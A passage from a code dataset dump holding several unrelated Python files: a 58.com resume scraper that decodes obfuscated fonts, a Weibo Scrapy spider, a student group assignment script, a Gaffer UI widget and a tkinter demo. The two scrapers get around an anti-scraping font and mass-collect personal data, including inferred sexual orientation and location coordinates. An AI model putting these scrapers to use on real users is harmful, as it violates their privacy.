format='%(asctime)s\\t%(levelname)s\\t%(message)s')\n","sub_path":"iwlearn/storage/filestore.py","file_name":"filestore.py","file_ext":"py","file_size_in_byte":7779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"43445463","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/12/28 14:46\n# @Author : longHui.wu \n# @File : maybe.py\nimport requests\nfrom lxml import etree\nimport re\nimport base64\nfrom fontTools.ttLib import TTFont\n\n# url = \"https://sz.58.com/searchjob/\"\nurl = \"https://sz.58.com/searchjob/pve_5569_1_pve_5568_1/\"\n\nheaders = {\n 'user-agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/73.0.3683.86 Safari/537.36\",\n}\n\nresponse = requests.get(url, headers=headers)\nhtml = etree.HTML(response.text)\nfont_face = html.xpath('//head/style[1]/text()')[0].strip()\n# 提前字体文件\nbase64_code = re.findall(r\"base64,(.*?)\\)\", font_face)\nif len(base64_code) != 0:\n base64_code = base64_code[0]\nwoff = base64.b64decode(base64_code)\n# base64 写入字体文件58tc.woff中,一定要wb方式写入,每次运行代码会覆盖文件\nwith open(\"58tc.woff\", \"wb\") as f:\n f.write(woff)\n\n# 打开下载保存好的新字体文件58tc.woff\nfont = TTFont('58tc.woff')\n# 打开本地保存的基本字体文件58.woff\nbase_font = TTFont(\"jianli.woff\")\n\n# getGlyphNames()[1:-1]和getGlyphOrder()[2:]结果是一样的\n# uni_list = font.getGlyphNames()[1:-1]\nuni_list = font.getGlyphOrder()[2:]\n\n# 定义一个临时存储新字体文件映射关系的字典temp\ntemp = {}\n# 把本地字体文件的映射关系用base_uni和base_value两个列表映射保存\nbase_uni = ['uniE16E', 'uniE1A8', 'uniE281', 'uniE2AE', 'uniE2BD', 'uniE2D6', 'uniE335', 'uniE393', 'uniE3B2',\n 'uniE50A', 'uniE539', 'uniE57F', 'uniE5F3', 'uniE766', 'uniE82D', 'uniE884', 'uniE90A', 'uniEA33',\n 'uniEAAF', 'uniEB01', 'uniEC12', 'uniEDC8', 'uniEDF5', 'uniEE81', 'uniEE83', 'uniEED5', 'uniEF5B',\n 'uniF0D3', 'uniF1B7', 'uniF23A', 'uniF340', 'uniF3BE', 'uniF3F1', 'uniF426', 'uniF4D4', 'uniF500', 'uniF521'\n , 'uniF542', 'uniF571', 'uniF588', 'uniF66D', 'uniF680', 'uniF699', 'uniF6A3', 'uniF835']\nbase_value = ['陈', '杨', 'E', '4', '6', 'M', '高', '下', '2', '李', '生', '吴', '经', '王', '3', '博', '技', '本',\n '周', '刘', '无', '应', '中', '校', '以', '7', '9', '科', '1', '届', '硕', '士', '黄', '大', '张', '5', '0'\n , 'B', '赵', 'A', '男', '专', '女', '验', '8']\n\n# base_uni = [\n# 'uniE0AC', 'uniE0D6', 'uniE189', 'uniE19A', 'uniE1BC', 'uniE441', 'uniE47A', 'uniE4BE', 'uniE4F1',\n# 'uniE587', 'uniE5B0', 'uniE5CE', 'uniE615', 'uniE632', 'uniE701', 'uniE87F', 'uniEAC1', 'uniEAF9',\n# 'uniEB60', 'uniEB96', 'uniEBB0', 'uniEC03', 'uniEF5F', 'uniEF8B', 'uniF037', 'uniF076', 'uniF0A0',\n# 'uniF13A', 'uniF14D', 'uniF1DB', 'uniF264', 'uniF2D1', 'uniF31A', 'uniF386', 'uniF406', 'uniF46B',\n# 'uniF49A', 'uniF4DB', 'uniF5F0', 'uniF607', 'uniF62A', 'uniF6E6', 'uniF772', 'uniF787', 'uniF7B9'\n# ]\n# base_value = [\n# '7', '下', '王', '周', '专', '0', '女', '博', '杨', '李', '校', '技', '届', '8', '男', '科', '中',\n# '赵', '生', 'M', '9', '以', '经', '6', '陈', 'A', '验', '黄', 'B', '5', '士', '1', '张', '硕', '4',\n# '高', '无', '大', '吴', 'E', '应', '3', '2', '本', '刘'\n# ]\n# 循环对比\nfor i in range(len(base_uni)):\n # 编码字体坐标转化成了列表,列表里是一个个元组,元组里放的是(x,y)坐标\n new_glyph = list(font['glyf'][uni_list[i]].coordinates)\n # 用前两个坐标作为取差值\n new_glyph_difference = [abs(k[0] - k[1]) for k in new_glyph[:2]]\n for j in range(len(base_uni)):\n base_glyph = list(base_font['glyf'][base_uni[j]].coordinates)\n base_glyph_difference = [abs(n[0] - n[1]) for n in base_glyph[:2]]\n # 比较两个差值是否为0\n if int(abs(sum(new_glyph_difference) / len(new_glyph_difference) - sum(base_glyph_difference) / len(\n base_glyph_difference))) == 0:\n # 把编码去掉uni三个字符然后转换成全小写,再拼接成网页源代码一样的编码格式,最后把映射关系存储到temp字典中\n temp[\"&#x\" + uni_list[i][3:].lower() + ';'] = base_value[j]\n\n# 构造正则表达式用|匹配左右任意一个表达式,替换编码\nre_rule = '(' + '|'.join(temp.keys()) + ')'\n# 把所有的编码替换成文字\nresponse_data = re.sub(re_rule, lambda x: temp[x.group()], response.text)\nweb = etree.HTML(response_data)\n\ncontent = web.xpath('//*[@id=\"infolist\"]/ul/li')\nperson = []\nfor el in content:\n name = el.xpath('./div[1]/dl/dd/div[1]/a/span/text()')\n sex = el.xpath('./div[1]/dl/dd/div[1]/a/div/div/em[1]/text()')\n age = el.xpath('./div[1]/dl/dd/div[1]/a/div/div/em[2]/text()')\n work_time = el.xpath('./div[1]/dl/dd/div[1]/a/div/div/em[3]/text()')\n school = el.xpath('./div[1]/dl/dd/div[1]/a/div/div/em[4]/text()')\n\n want_work = el.xpath('./div[1]/dl/dd/p[1]/span/text()')\n now = el.xpath('./div[1]/dl/dd/p[1]/em[2]/text()')\n want_local = el.xpath('./div[1]/dl/dd/p[2]/span/text()')\n print(name, sex, age, work_time, school, want_work, now, want_local)\n\n# personal_information = data.xpath('//div[@id=\"infolist\"]/ul/li//dl[@class=\"infocardMessage clearfix\"]')\n# for info in personal_information:\n# # 姓名\n# name = info.xpath('./dd//span[@class=\"infocardName fl stonefont resumeName\"]/text()')[0]\n# # 性别\n# gender = info.xpath('./dd//div[@ class=\"infocardBasic fl\"]/div/em[1]/text()')[0]\n# # 年龄\n# age = info.xpath('./dd//div[@ class=\"infocardBasic fl\"]/div/em[2]/text()')[0]\n# school = info.xpath('./div[1]/dl/dd/div[1]/a/div/div/em[4]/text()')\n# # 工作经验\n# work_experiences = info.xpath('./dd//div[@ class=\"infocardBasic fl\"]/div/em[3]/text()')\n# if work_experiences == []:\n# work_experience = \"\"\n# else:\n# work_experience = info.xpath('./dd//div[@ class=\"infocardBasic fl\"]/div/em[3]/text()')[0]\n# # 学历\n# educations = info.xpath('./dd//div[@ class=\"infocardBasic fl\"]/div/em[4]/text()')\n# if educations == []:\n# education = \"\"\n# else:\n# education = info.xpath('./dd//div[@ class=\"infocardBasic fl\"]/div/em[4]/text()')[0]\n# print(name, gender, age, work_experience, education)\n","sub_path":"city58/maybe.py","file_name":"maybe.py","file_ext":"py","file_size_in_byte":6167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"63811457","text":"# -*- coding: utf-8 -*-\nimport re\nimport datetime\nfrom datetime import timedelta\nfrom scrapy.spider import CrawlSpider\nfrom scrapy.selector import Selector\nfrom scrapy.http import Request\nfrom Sina_spider.items import InformationItem, TweetsItem, RelationshipsItem,CommentsItem,RepostsItem\nimport logging\nfrom scrapy.shell import inspect_response\nimport urllib\nimport os\nimport json\n\nclass SinaspiderSpider(CrawlSpider):\n name = 'SinaSpider'\n host = \"http://weibo.cn\"\n weiboID = ['2286908003']\n start_urls = list(set(weiboID))\n logging.getLogger(\"requests\").setLevel(logging.WARNING) # 将requests的日志级别设成WARNING\n def start_requests(self):\n for uid in self.start_urls:\n yield Request(url=\"https://weibo.cn/%s/info\" % uid, callback=self.parse_information)\n \n def parse_information(self, response):\n \"\"\" 抓取个人信息 \"\"\"\n informationItem = InformationItem()\n selector = Selector(response)\n ID = re.findall('(\\d+)/info', response.url)[0]\n try:\n logging.warning(\"开始解析个人信息...\")\n # img_url = selector.xpath('//img[@alt=\"头像\"]/@src').extract()\n # urllib.request.urlretrieve(img_url[0], './headimage/' + str(ID)+'.jpg')\n text1 = \";\".join(selector.xpath('body/div[@class=\"c\"]//text()').extract()) # 获取标签里的所有text()\n nickname = re.findall('昵称[;::]+(.*?);', text1)\n gender = re.findall('性别[;::]?(.*?);', text1)\n place = re.findall('地区[;::]?(.*?);' , text1)\n briefIntroduction = re.findall('简介[;::]?(.*?);' , text1)\n birthday = re.findall('生日[;::]?(.*?);' , text1) \n sexOrientation = re.findall('性取向[;::]?(.*?);' , text1)\n sentiment = re.findall('感情状况[;::]?(.*?);' , text1)\n vipLevel = re.findall('会员等级[;::]?(.*?);' , text1)\n authentication = re.findall('认证[;::]?(.*?);' , text1)\n url = re.findall('互联网[;::]?(.*?);' , text1)\n logging.warning(\"解析完成...\")\n informationItem[\"_id\"] = ID\n # if img_url and img_url[0]:\n # logging.warning(\"存入头像图片...\")\n # informationItem[\"img_url\"] = img_url[0]\n if nickname and nickname[0]:\n logging.warning(\"存入姓名...\")\n informationItem[\"NickName\"] = nickname[0].replace(u\"\\xa0\", \"\")\n if gender and gender[0]:\n logging.warning(\"存入性别...\")\n informationItem[\"Gender\"] = gender[0].replace(u\"\\xa0\", \"\")\n if place and place[0]:\n logging.warning(\"存入地址...\")\n place = place[0].replace(u\"\\xa0\", \"\").split(\" \")\n informationItem[\"Province\"] = place[0]\n if len(place) > 1:\n informationItem[\"City\"] = place[1]\n if briefIntroduction and briefIntroduction[0]:\n logging.warning(\"存入简介...\")\n informationItem[\"BriefIntroduction\"] = briefIntroduction[0].replace(u\"\\xa0\", \"\")\n if birthday and birthday[0]:\n logging.warning(\"存入生日...\")\n try:\n informationItem[\"Birthday\"] = datetime.datetime.strptime(birthday[0], \"%Y-%m-%d\")\n except Exception:\n informationItem['Birthday'] = birthday[0] # 有可能是星座,而非时间\n if sexOrientation and sexOrientation[0]:\n logging.warning(\"存入性取向...\")\n if sexOrientation[0].replace(u\"\\xa0\", \"\") == gender[0]:\n informationItem[\"SexOrientation\"] = \"同性恋\"\n else:\n informationItem[\"SexOrientation\"] = \"异性恋\"\n if sentiment and sentiment[0]:\n logging.warning(\"存入情感状况...\")\n informationItem[\"Sentiment\"] = sentiment[0].replace(u\"\\xa0\", \"\")\n if vipLevel and vipLevel[0]:\n logging.warning(\"存入会员等级...\")\n informationItem[\"VIPlevel\"] = vipLevel[0].replace(u\"\\xa0\", \"\")\n if authentication and authentication[0]:\n logging.warning(\"存入认证...\")\n informationItem[\"Authentication\"] = authentication[0].replace(u\"\\xa0\", \"\")\n if url:\n informationItem[\"URL\"] = url[0]\n\n try:\n urlothers = \"https://weibo.cn/attgroup/opening?uid=%s\" % ID\n r = requests.get(urlothers, cookies=response.request.cookies, timeout=5)\n if r.status_code == 200:\n selector = etree.HTML(r.content)\n texts = \";\".join(selector.xpath('//body//div[@class=\"tip2\"]/a//text()'))\n if texts:\n logging.warning(\"开始解析微博数,关注数,粉丝数...\")\n num_tweets = re.findall('微博\\[(\\d+)\\]', texts)\n num_follows = re.findall('关注\\[(\\d+)\\]', texts)\n num_fans = re.findall('粉丝\\[(\\d+)\\]', texts)\n if num_tweets:\n logging.warning(\"存入微博数...\")\n informationItem[\"Num_Tweets\"] = int(num_tweets[0])\n if num_follows:\n logging.warning(\"存入关注数...\")\n informationItem[\"Num_Follows\"] = int(num_follows[0])\n if num_fans:\n logging.warning(\"存入粉丝数...\")\n informationItem[\"Num_Fans\"] = int(num_fans[0])\n except Exception :\n pass\n except Exception:\n logging.warning(\"未解析\")\n else:\n yield informationItem\n yield Request(url=\"https://weibo.cn/%s/profile?filter=1&page=1\" % ID, callback=self.parse_tweets, dont_filter=True)\n yield Request(url=\"https://weibo.cn/%s/follow\" % ID, callback=self.parse_relationship, dont_filter=True)\n yield Request(url=\"https://weibo.cn/%s/fans\" % ID, callback=self.parse_relationship, dont_filter=True)\n\n def parse_tweets(self, response):\n \"\"\" 抓取微博数据 \"\"\"\n tweetIDs = []\n selector = Selector(response)\n ID = re.findall('(\\d+)/profile', response.url)[0]\n divs = selector.xpath('body/div[@class=\"c\" and @id]')\n for div in divs:\n try:\n logging.warning(\"开始解析微博数据...\")\n tweetsItems = TweetsItem()\n id = div.xpath('@id').extract_first()[2:] # 微博ID\n tweetIDs.append(id) # 加入微博列表\n content = div.xpath('div/span[@class=\"ctt\"]//text()').extract() # 微博内容\n cooridinates = div.xpath('div/a/@href').extract() # 定位坐标\n like = re.findall('赞\\[(\\d+)\\]', div.extract()) # 点赞数\n transfer = re.findall('转发\\[(\\d+)\\]', div.extract()) # 转载数\n comment = re.findall('评论\\[(\\d+)\\]', div.extract()) # 评论数\n others = div.xpath('div/span[@class=\"ct\"]/text()').extract() # 求时间和使用工具(手机或平台)\n tweetsItems[\"_id\"] = ID + \"-\" + id\n tweetsItems[\"ID\"] = ID\n if content:\n logging.warning(\"存入微博内容...\")\n tweetsItems[\"Content\"] = \" \".join(content).strip('[位置]') # 去掉最后的\"[位置]\"\n if cooridinates:\n logging.warning(\"存入微博定位...\")\n cooridinates = re.findall('center=([\\d.,]+)', cooridinates[0])\n if cooridinates:\n tweetsItems[\"Co_oridinates\"] = cooridinates[0]\n if like:\n logging.warning(\"存入点赞数...\")\n tweetsItems[\"Like\"] = int(like[0])\n if transfer:\n logging.warning(\"存入转发数...\")\n tweetsItems[\"Transfer\"] = int(transfer[0])\n if comment:\n logging.warning(\"存入评论数...\")\n tweetsItems[\"Comment\"] = int(comment[0])\n if others:\n others = others[0].split('来自')\n pubtime = others[0].replace(u\"\\xa0\", \"\")\n if \"分钟前\" in pubtime: # 添加上年月日 计算时间\n now = datetime.datetime.now()\n time = re.findall(\"(\\d+)分钟前\",pubtime)\n after = datetime.timedelta(minutes = int(time[0]))\n tweetsItems[\"PubTime\"] = (now - after).strftime(\"%Y-%m-%d %H:%M:%S\")\n elif \"今天\" in pubtime: # 添加上年月日 加上时间\n time = re.findall(\"今天 (.*)\",pubtime)\n now = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n tweetsItems[\"PubTime\"] = now + \" \" +time[0]\n elif re.search(\"20\\d+\\-\",pubtime):\n tweetsItems[\"PubTime\"] = pubtime\n else: # 只将格式转变为年月日格式\n now = datetime.datetime.now().strftime(\"%Y\")\n try:\n time = datetime.datetime.strptime(pubtime,\"%m月%d日 %H:%M\").strftime(\"%m-%d %H:%M\")\n except:\n pass\n else:\n tweetsItems[\"PubTime\"] = now + \"-\" + time\n if len(others) == 2:\n tweetsItems[\"Tools\"] = others[1].replace(u\"\\xa0\", \"\")\n except Exception:\n pass\n else:\n yield tweetsItems\n\n for tweetID in tweetIDs:\n yield Request(url = \"https://weibo.cn/comment/\" + tweetID + \"?&uid=\"+ ID +\"&page=1\",callback = self.parse_comments,dont_filter = True) # 抓取评论\n yield Request(url = \"https://weibo.cn/repost/\" + tweetID + \"?&uid=\"+ ID +\"&page=1\",callback = self.parse_reposts,dont_filter = True) # 抓取转发\n\n url_next = selector.xpath('body/div[@class=\"pa\" and @id=\"pagelist\"]/form/div/a[text()=\"下页\"]/@href').extract()\n if url_next:\n logging.warning(self.host + url_next[0])\n yield Request(url=self.host + url_next[0], callback=self.parse_tweets, dont_filter=True)\n\n def parse_comments(self,response):\n '''抓取评论'''\n selector = Selector(response)\n divs = selector.xpath('body/div[@class=\"c\" and @id]')\n ID = re.findall('comment/([\\w\\d]+)\\?\\&uid=',response.url) # 微博ID\n for div in divs:\n try:\n user_id = div.xpath('a/@href').extract()\n user_name = div.xpath('a/text()').extract()\n likenum = re.findall('赞\\[(\\d+)\\]',div.extract())\n source = re.findall('来自(.*?)',div.extract())\n created_at = re.findall('(.*?)\\\\xa0来自',div.extract())\n text = div.xpath('span[@class=\"ctt\"]/text()').extract()\n commentItems = CommentsItem()\n if user_id and user_id[0]:\n if len(user_id) == 2:\n user_id = re.findall('&fuid=(\\d+)',user_id[1])\n commentItems[\"User_id\"] = user_id[0]\n commentItems['_id'] = ID[0] + \"-\" +user_id[0] # 主键\n if user_name and user_name[0]:\n commentItems[\"User_name\"] = user_name[0]\n if likenum and likenum[0]:\n commentItems[\"Likenum\"] = likenum[0]\n if source and source[0]:\n if \"iPhone客户端\" in source[0]:\n source[0] = \"iPhone客户端\"\n commentItems[\"Source\"] = source[0]\n if created_at and created_at[0]:\n if \"分钟前\" in created_at[0]: # 添加上年月日 计算时间\n now = datetime.datetime.now()\n time = re.findall(\"(\\d+)分钟前\",created_at[0])\n after = datetime.timedelta(minutes = int(time[0]))\n commentItems[\"Created_at\"] = (now - after).strftime(\"%Y-%m-%d %H:%M:%S\")\n elif \"今天\" in created_at[0]: # 添加上年月日 加上时间\n time = re.findall(\"今天 (.*)\",created_at[0])\n now = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n commentItems[\"Created_at\"] = now + \" \" +time[0]\n elif re.search(\"20\\d+\\-\",created_at[0]):\n commentItems[\"Created_at\"] = created_at[0]\n else: # 只将格式转变为年月日格式\n now = datetime.datetime.now().strftime(\"%Y\")\n try:\n time = datetime.datetime.strptime(created_at[0],\"%m月%d日 %H:%M\").strftime(\"%m-%d %H:%M\")\n except:\n pass\n else:\n commentItems[\"Created_at\"] = now + \"-\" + time\n if text and text[0]:\n if len(text) == 2 and text[0] == \"回复\":\n name = div.xpath('span[@class=\"ctt\"]/a/text()').extract()\n if name and name[0]:\n commentItems[\"Text\"] = text[0] + name[0] + text[1]\n else:\n logging.warning(\"匹���不上\")\n else:\n commentItems[\"Text\"] = text[0]\n except Exception :\n logging.warning(\"评论爬取失败...\")\n pass\n else:\n yield commentItems\n url_next = selector.xpath('body/div[@class=\"pa\" and @id=\"pagelist\"]/form/div/a[text()=\"下页\"]/@href').extract()\n if url_next:\n logging.warning(self.host + url_next[0])\n yield Request(url = self.host + url_next[0],callback = self.parse_comments,dont_filter = True)\n\n def parse_reposts(self,response):\n '''抓取转发'''\n selector = Selector(response)\n divs = selector.xpath('body/div[@class=\"c\"]')\n ID = re.findall('repost/([\\w\\d]+)\\?\\&uid=',response.url) # 微博ID\n for div in divs:\n try:\n # user_id = div.xpath('a/@href').extract()\n user_name = div.xpath('a/text()').extract()\n likenum = re.findall('赞\\[(\\d+)\\]',div.extract())\n source = re.findall('来自(.*?)',div.extract())\n created_at = re.findall('\\\\xa0(.*?)\\\\xa0来自',div.extract())\n text = re.findall('\\:(.*?)\\\\xa0\\',div.extract())\n repostsItems = RepostsItem()\n repostsItems['_id'] = ID[0] + \"-\" + user_name[0]\n # if user_id and user_id[0]:\n # if len(user_id) == 2:\n # user_id = re.findall('&fuid=(\\d+)',user_id[1])\n # repostsItems[\"User_id\"] = User_id[0]\n if user_name and user_name[0] != '返回我的首页':\n repostsItems[\"User_name\"] = user_name[0]\n if likenum and likenum[0]:\n repostsItems[\"Likenum\"] = likenum[0]\n if source and source[0]:\n repostsItems[\"Source\"] = source[0]\n if created_at and created_at[0]:\n if \"分钟前\" in created_at[0]: # 添加上年月日 计算时间\n now = datetime.datetime.now()\n time = re.findall(\"(\\d+)分钟前\",created_at[0])\n after = datetime.timedelta(minutes = int(time[0]))\n repostsItems[\"Created_at\"] = (now - after).strftime(\"%Y-%m-%d %H:%M:%S\")\n elif \"今天\" in created_at[0]: # 添加上年月日 加上时间\n time = re.findall(\"今天 (.*)\",created_at[0])\n now = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n repostsItems[\"Created_at\"] = now + \" \" +time[0]\n elif re.search(\"20\\d+\\-\",created_at[0]):\n repostsItems[\"Created_at\"] = created_at[0]\n else: # 只将格式转变为年月日格式\n now = datetime.datetime.now().strftime(\"%Y\")\n try:\n time = datetime.datetime.strptime(created_at[0],\"%m月%d日 %H:%M\").strftime(\"%m-%d %H:%M\")\n except:\n pass\n else:\n repostsItems[\"Created_at\"] = now + \"-\" + time\n if text and text[0]:\n repost_text = re.split(\"<|>\",text[0])\n line = \"\"\n for i in repost_text:\n if \"alt=\" not in i and \"a href\" not in i and \"/a\" not in i:\n line = line + \" \" + i \n repostsItems[\"Text\"] = line\n except Exception :\n logging.warning(\"转发爬取失败...\")\n pass\n else:\n yield repostsItems\n \n url_next = selector.xpath('body/div[@class=\"pa\" and @id=\"pagelist\"]/form/div/a[text()=\"下页\"]/@href').extract()\n if url_next:\n logging.warning(self.host + url_next[0])\n yield Request(url = self.host + url_next[0],callback = self.parse_reposts,dont_filter = True)\n \n def parse_relationship(self, response):\n \"\"\" 打开url爬取里面的个人ID \"\"\"\n selector = Selector(response)\n if \"/follow\" in response.url:\n ID = re.findall('(\\d+)/follow', response.url)[0]\n flag = True\n else:\n ID = re.findall('(\\d+)/fans', response.url)[0]\n flag = False \n urls = selector.xpath('//a[text()=\"关注他\" or text()=\"关注她\"]/@href').extract()\n uids = re.findall('uid=(\\d+)', \";\".join(urls), re.S)\n for uid in uids:\n relationshipsItem = RelationshipsItem()\n relationshipsItem[\"Host1\"] = ID if flag else uid\n relationshipsItem[\"Host2\"] = uid if flag else ID\n yield relationshipsItem\n yield Request(url=\"https://weibo.cn/%s/info\" % uid, callback=self.parse_information)\n\n next_url = selector.xpath('//a[text()=\"下页\"]/@href').extract()\n if next_url:\n yield Request(url=self.host + next_url[0], callback=self.parse_relationship, dont_filter=True)\n\n ","sub_path":"Sina_spider/Sina_spider/spiders/SinaSpider.py","file_name":"SinaSpider.py","file_ext":"py","file_size_in_byte":18934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"337710577","text":"#Output format\n#Group #, Day, Time, Room\n#Pilot leader\n#First Last, JHED ID, Hopkins ID, email\n\ndef assign(roomList,finalRoomCombo,finalStudentAssignments,leaderRooms,leaderAssignments,subjectNames):\n for subjectRooms,subjectAssignments,subjectName,subjectLeaders,leaderMeeting in zip(finalRoomCombo,finalStudentAssignments,subjectNames,leaderAssignments,leaderRooms): #iterate by subject\n f=open(subjectName+'.txt','w')\n #print class data\n counter=1\n for room,classAssignments,leader in zip(subjectRooms,subjectAssignments,subjectLeaders):\n f.write('Group '+str(counter)+', '+roomList[room].time+', '+roomList[room].classroom)\n f.write(leader.name) #PILOT leader\n for student in classAssignments:\n f.write(student.name+', '+student.jhu+', '+student.mail)\n f.write('\\n')\n counter=counter+1\n #print leader data\n f.write('Leaders')\n f.write(leaderMeeting.classroom)\n for x in subjectLeaders:\n f.write(x.name)\n f.close()\n\ndef assign2(roomList,finalRoomCombo,finalStudentAssignments,subjectNames):\n for subjectRooms,subjectAssignments,subjectName in zip(finalRoomCombo,finalStudentAssignments,subjectNames): #iterate by subject\n f=open(subjectName+'.txt','w')\n #print class data\n counter=1\n for room,classAssignments in zip(subjectRooms,subjectAssignments):\n f.write('Group '+str(counter)+','+roomList[room].time+','+roomList[room].classroom+'\\n')\n for student in classAssignments:\n f.write(student.name+', '+student.jhu+', '+student.mail+'\\n')\n f.write('\\n')\n counter=counter+1\n f.close()\n\n","sub_path":"assignEverything.py","file_name":"assignEverything.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"297589794","text":"##########################################################################\n#\n# Copyright (c) 2019, Image Engine Design Inc. All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer.\n#\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided with\n# the distribution.\n#\n# * Neither the name of John Haddon nor the names of\n# any other contributors to this software may be used to endorse or\n# promote products derived from this software without specific prior\n# written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS\n# IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n##########################################################################\n\nimport Gaffer\nimport GafferUI\n\nimport IECore\n\nfrom Qt import QtWidgets\n\nclass _CellPlugValueWidget( GafferUI.PlugValueWidget ) :\n\n\tdef __init__( self, plug, **kw ) :\n\n\t\tself.__row = GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal, spacing = 4 )\n\t\tGafferUI.PlugValueWidget.__init__( self, self.__row, plug )\n\n\t\trowPlug = plug.ancestor( Gaffer.Spreadsheet.RowPlug )\n\t\tif \"enabled\" in plug and rowPlug != rowPlug.parent().defaultRow() :\n\t\t\tenabledPlugValueWidget = GafferUI.BoolPlugValueWidget(\n\t\t\t\tplug[\"enabled\"],\n\t\t\t\tdisplayMode=GafferUI.BoolWidget.DisplayMode.Switch\n\t\t\t)\n\t\t\tself.__row.append( enabledPlugValueWidget, verticalAlignment=GafferUI.VerticalAlignment.Top )\n\n\t\tplugValueWidget = self.__createValueWidget( plug[\"value\"] )\n\n\t\t# Apply some fixed widths for some widgets, otherwise they're\n\t\t# a bit too eager to grow. \\todo Should we change the underlying\n\t\t# behaviour of the widgets themselves?\n\t\tself.__applyFixedWidths( plugValueWidget )\n\n\t\tself.__row.append( plugValueWidget )\n\n\t\tself._updateFromPlug()\n\n\tdef childPlugValueWidget( self, childPlug ) :\n\n\t\tfor widget in self.__row :\n\t\t\tif widget.getPlug() == childPlug :\n\t\t\t\treturn widget\n\n\t\treturn None\n\n\t# By default, `PlugValueWidget.create( cell[\"value\"] )` is used to create\n\t# a widget for editing cells in the spreadsheet, but custom editors may be\n\t# provided for specific plug types.\n\n\t# Registers a function to return a PlugValueWidget for editing cell\n\t# value plugs of the specified type.\n\t@classmethod\n\tdef registerValueWidget( cls, plugType, plugValueWidgetCreator ) :\n\n\t\tcls.__plugValueWidgetCreators[plugType] = plugValueWidgetCreator\n\n\tdef __createValueWidget( self, plug ) :\n\n\t\tcreator = self.__plugValueWidgetCreators.get(\n\t\t\tplug.__class__,\n\t\t\tGafferUI.PlugValueWidget.create\n\t\t)\n\n\t\tw = creator( plug )\n\t\tassert( isinstance( w, GafferUI.PlugValueWidget ) )\n\t\treturn w\n\n\t__plugValueWidgetCreators = {}\n\n\tdef _updateFromPlug( self ) :\n\n\t\tif \"enabled\" in self.getPlug() :\n\t\t\tenabled = False\n\t\t\twith self.getContext() :\n\t\t\t\twith IECore.IgnoredExceptions( Exception ) :\n\t\t\t\t\tenabled = self.getPlug()[\"enabled\"].getValue()\n\t\t\tself.__row[-1].setEnabled( enabled )\n\n\t__numericFieldWidth = 60\n\n\t@classmethod\n\tdef __applyFixedWidths( cls, plugValueWidget ) :\n\n\t\tdef walk( widget ) :\n\n\t\t\tif isinstance( widget, GafferUI.NumericPlugValueWidget ) :\n\t\t\t\twidget._qtWidget().setFixedWidth( cls.__numericFieldWidth )\n\t\t\t\twidget._qtWidget().layout().setSizeConstraint( QtWidgets.QLayout.SetNoConstraint )\n\n\t\t\tfor childPlug in Gaffer.Plug.Range( widget.getPlug() ) :\n\t\t\t\tchildWidget = widget.childPlugValueWidget( childPlug )\n\t\t\t\tif childWidget is not None :\n\t\t\t\t\twalk( childWidget )\n\n\t\tif isinstance( plugValueWidget, GafferUI.VectorDataPlugValueWidget ) :\n\t\t\tplugValueWidget._qtWidget().setFixedWidth( 250 )\n\t\telse :\n\t\t\twalk( plugValueWidget )\n\nGafferUI.PlugValueWidget.registerType( Gaffer.Spreadsheet.CellPlug, _CellPlugValueWidget )\n","sub_path":"python/GafferUI/SpreadsheetUI/_CellPlugValueWidget.py","file_name":"_CellPlugValueWidget.py","file_ext":"py","file_size_in_byte":4726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"501954459","text":"from tkinter import *\n\ndef doNothing():\n\tprint(\"Okay, I wont..\")\n\n\nroot = Tk()\n\n# ** Main Menu ** # \nmenu = Menu(root)\n\nroot.config(menu=menu) # configuring menu with root\n\nsubMenu = Menu(menu)\nmenu.add_cascade(label=\"File\",menu=subMenu)\nsubMenu.add_command(label=\"New\",command=doNothing)\nsubMenu.add_command(label=\"Open\",command=doNothing)\nsubMenu.add_separator()\nsubMenu.add_command(label=\"Exit\",command= doNothing)\n\neditMenu = Menu(menu)\nmenu.add_cascade(label=\"Edit\",menu=editMenu)\neditMenu.add_command(label=\"Redo\",command=doNothing)\neditMenu.add_command(label=\"Exit\",command= doNothing)\n\n\n# *** The Toolbar *** #\ntoolbar = Frame(root, bg=\"blue\")\n\nbtn_1 = Button(toolbar,text=\"Insert Image\",command=doNothing)\nbtn_1.pack(side=LEFT, padx=2, pady=2)\nbtn_2 = Button(toolbar,text=\"Print\",command=doNothing)\nbtn_2.pack(side=LEFT, padx=2, pady=2)\n\ntoolbar.pack(side=TOP, 